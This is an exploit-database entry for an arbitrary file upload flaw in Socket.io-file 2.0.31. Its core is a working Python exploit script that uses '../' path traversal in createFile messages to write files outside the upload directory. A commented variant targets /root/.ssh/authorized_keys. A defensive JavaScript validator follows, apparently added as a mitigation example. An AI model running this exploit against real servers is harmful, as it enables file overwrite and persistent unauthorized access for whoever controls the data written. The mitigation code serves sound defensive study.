Socket.io-file 2.0.31 - Arbitrary File Upload

Date: 26 Jul 2020
Reported by: Cr0wTom
Type: exploitdb
Source: www.exploit-db.com

Socket.io-file 2.0.31 - Arbitrary File Upload. The exploit allows arbitrary file creation and data writing by exploiting improper input validation in the file upload functionality.

Code
# Exploit Title: Socket.io-file 2.0.31 - Arbitrary File Upload
# Date: 2020-07-02
# Exploit Author: Cr0wTom
# Vendor Homepage: https://www.npmjs.com/package/socket.io-file
# Software Link: https://www.npmjs.com/package/socket.io-file/v/2.0.31
# Version: <= v2.0.31
# Tested on: node v10.19.0, Socket.io-file v2.0.31, socket.io v2.3.0
# CVE: -

# Requirements: pip install socketIO-client-nexus==0.7.6

#!/usr/bin/env python

import sys
import json
import os
from socketIO_client_nexus import SocketIO, LoggingNamespace

def file_creation(RHOST, RPORT):
    print ('Initiating connection...')
    with SocketIO(RHOST, RPORT, LoggingNamespace) as socketIO:

        print ('Creating file...')

        # The example server runs in /home/testuser/Documents/socket-app, so customize the path appropriately
        # Change the "name" option if you want to create another file in a different path of the system
        socketIO.emit("socket.io-file::createFile",{"id":"u_0","name":"../client/index.html","size":1,"chunkSize":10240,"sent":0,"data":{}})

        # Example for server running with root access:
        # socketIO.emit("socket.io-file::createFile",{"id":"u_0","name":"../../../../../root/.ssh/authorized_keys","size":1,"chunkSize":10240,"sent":0,"data":{}})
        
        print ('Writing data to file...')

        # Add the data you want to get written to the file
        data = "Exploited by Cr0wTom"
        json_string = json.dumps(data)
        socketIO.once("socket.io-file::request::u_0", on_aaa_response)
        socketIO.emit("socket.io-file::stream::u_0", json_string)

def on_aaa_response(*args):
    print('on_aaa_response', args)

def print_usage():
    print ('Socket.io-file <= 2.0.31 - Improper Input Validation in File Upload Functionality')
    print ('Exploit Author: Cr0wTom (https://cr0wsplace.com)\n')
    print ('Usage: python3 exploit.py <RHOST> <RPORT>')
    print ('RHOST        The target host IP address or domain.')
    print ('RPORT        The target host port number of the nodejs server.')

if __name__ == '__main__':

    # ensure we have at least an IP and Port
    if len(sys.argv) < 3:
        print_usage()
        sys.exit(1)

    print ('Socket.io-file <= 2.0.31 - Improper Input Validation in File Upload Functionality')
    print ('Exploit Author: Cr0wTom (https://cr0wsplace.com)\n')
    file_creation(sys.argv[1], sys.argv[2])
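
A server-side check that would refuse the `name` values used in the `createFile` messages above, as an added example (not code from the socket.io-file project or from the exploit author). `resolveUploadPath`, `validateCreateFile`, `UPLOAD_DIR` and `MAX_SIZE` are hypothetical names and assumed limits.

```javascript
'use strict';
const path = require('path');

// Assumed values: the page does not give the server's upload directory or limits.
const UPLOAD_DIR = path.resolve('/srv/app/data');
const MAX_SIZE = 10 * 1024 * 1024;

// Map a client-supplied `name` to a path inside uploadDir, or return null.
function resolveUploadPath(name, uploadDir = UPLOAD_DIR) {
  if (typeof name !== 'string' || name.length === 0 || name.length > 255) return null;
  if (name.includes('\0')) return null;
  // Policy: clients send a bare file name, never a path.
  if (/[\\/]/.test(name) || name === '.' || name === '..') return null;
  const dest = path.resolve(uploadDir, name);
  // Defence in depth: the resolved destination must stay under uploadDir.
  const rel = path.relative(uploadDir, dest);
  if (rel === '' || rel === '..' || rel.startsWith('..' + path.sep) || path.isAbsolute(rel)) return null;
  return dest;
}

// Validate a createFile message before any file handle is opened.
function validateCreateFile(msg) {
  if (msg === null || typeof msg !== 'object') return { ok: false, reason: 'payload' };
  const dest = resolveUploadPath(msg.name);
  if (dest === null) return { ok: false, reason: 'name' };
  if (!Number.isInteger(msg.size) || msg.size < 0 || msg.size > MAX_SIZE) {
    return { ok: false, reason: 'size' };
  }
  return { ok: true, dest };
}

// Constructed sample messages; the first two reuse the `name` values shown above.
const samples = [
  { id: 'u_0', name: '../client/index.html', size: 1 },
  { id: 'u_0', name: '../../../../../root/.ssh/authorized_keys', size: 1 },
  { id: 'u_1', name: 'report.pdf', size: 2048 },
  { id: 'u_2', name: 'report.pdf', size: -1 },
];
for (const m of samples) {
  console.log(JSON.stringify(m.name), '->', JSON.stringify(validateCreateFile(m)));
}
```

Rejecting path separators outright is stricter than the containment check alone; the `path.relative` test remains as a second barrier if the naming policy is later relaxed.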

Vulners AI Score: 7.4 (High risk)